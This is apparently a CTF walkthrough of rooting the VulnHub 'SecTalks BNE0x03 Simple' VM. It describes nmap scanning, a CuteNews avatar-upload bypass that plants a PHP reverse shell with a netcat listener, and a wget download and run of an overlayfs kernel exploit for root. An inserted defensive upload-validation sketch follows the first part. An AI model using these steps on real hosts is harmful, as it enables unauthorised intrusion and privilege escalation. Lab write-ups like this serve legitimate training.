[VULNHUB] SecTalks: BNE0x03 – Simple

This VM is a really easy boot2root challenge. I pwned it in 5 minutes, let’s start!

PART ONE

I scanned all available services with nmap:

nmap 192.168.1.20 -sV

The output is:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-15 19:09 CEST
Nmap scan report for 192.168.1.20
Host is up (0.0021s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.29 seconds

So there is only a website here. I opened it and I have a login form in front of me. The server is running CuteNews v.2.0.3 and after some research I found an arbitrary file upload vulnerability here. So I just registered a new user (testuser in this case) and I logged in. Then I clicked on “Personal Options”. Now I started Burp Suite and I activated the proxy interception. Then I downloaded this shell and I edited the first 2 lines with my local IP and listening port. Then I renamed it with a .jpg extension and I clicked “Browse…”, I selected the file and I pressed “Save Changes”. Now I edited the POST request in Burp Suite, changing the extension to .php, I forwarded the request and the file was uploaded! Now I started listening locally:

nc -lvp 1234

Now I browsed to http://192.168.1.20/uploads/avatar_testuser_php-reverse-shell.php and I got the reverse shell without TTY. To achieve this I just used python:

python -c 'import pty; pty.spawn("/bin/bash")'
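
The upload above worked because the stored file kept the .php extension taken from the edited request. As an added example (not CuteNews code and not part of the original post), here is a server-side check sketched in Python that never trusts the client-supplied filename and derives the extension from the file's leading bytes; all function names and sample inputs are hypothetical and constructed for illustration.

```python
import re

# Allow-list: magic-byte prefix -> extension the server assigns on disk.
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


class UploadRejected(Exception):
    """Raised when an avatar upload fails server-side validation."""


def sniff_extension(data: bytes):
    """Return the allow-listed extension matching the leading bytes, or None."""
    for magic, ext in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def stored_avatar_name(username: str, client_filename: str, data: bytes) -> str:
    """Choose the on-disk name. client_filename is accepted but never used:
    the extension comes only from the content, so editing it in transit
    changes nothing."""
    ext = sniff_extension(data)
    if ext is None:
        raise UploadRejected("content is not an allow-listed image type")
    # Heuristic guard against image/script polyglots; re-encoding the image
    # server-side would be a stronger control.
    if b"<?php" in data.lower():
        raise UploadRejected("image contains an embedded PHP open tag")
    # Strip path separators and dots from the user-controlled name part.
    safe_user = re.sub(r"[^A-Za-z0-9_-]", "_", username)[:32]
    return f"avatar_{safe_user}.{ext}"


# Constructed sample inputs (placeholders, not real files).
SCRIPT_SAMPLE = b"<?php /* constructed placeholder */ ?>"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
POLYGLOT_SAMPLE = b"GIF89a" + b"\x00" * 8 + b"<?php /* placeholder */ ?>"
```

With this check, a script renamed to .jpg is rejected on content, and a genuine image submitted under a .php name is still stored with an image extension. The uploads directory should also be configured so the web server does not execute scripts from it.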

PART TWO

Now I need to escalate privileges. I started checking the kernel version:

uname -a

The output is:

Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

I checked the kernel version online and I discovered that it was vulnerable to the overlayfs exploit. So I browsed to /tmp and I typed:

wget "https://www.kernel-exploits.com/media/ofs_32"

Then I gave it execution permissions:

chmod +x ofs_32

And now I just executed it:

./ofs_32

I got a shell as root! I re-spawned a TTY shell with python and I browsed to /root and I listed files and I found flag.txt. I just opened it:

U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!

The VM is rooted and completed!
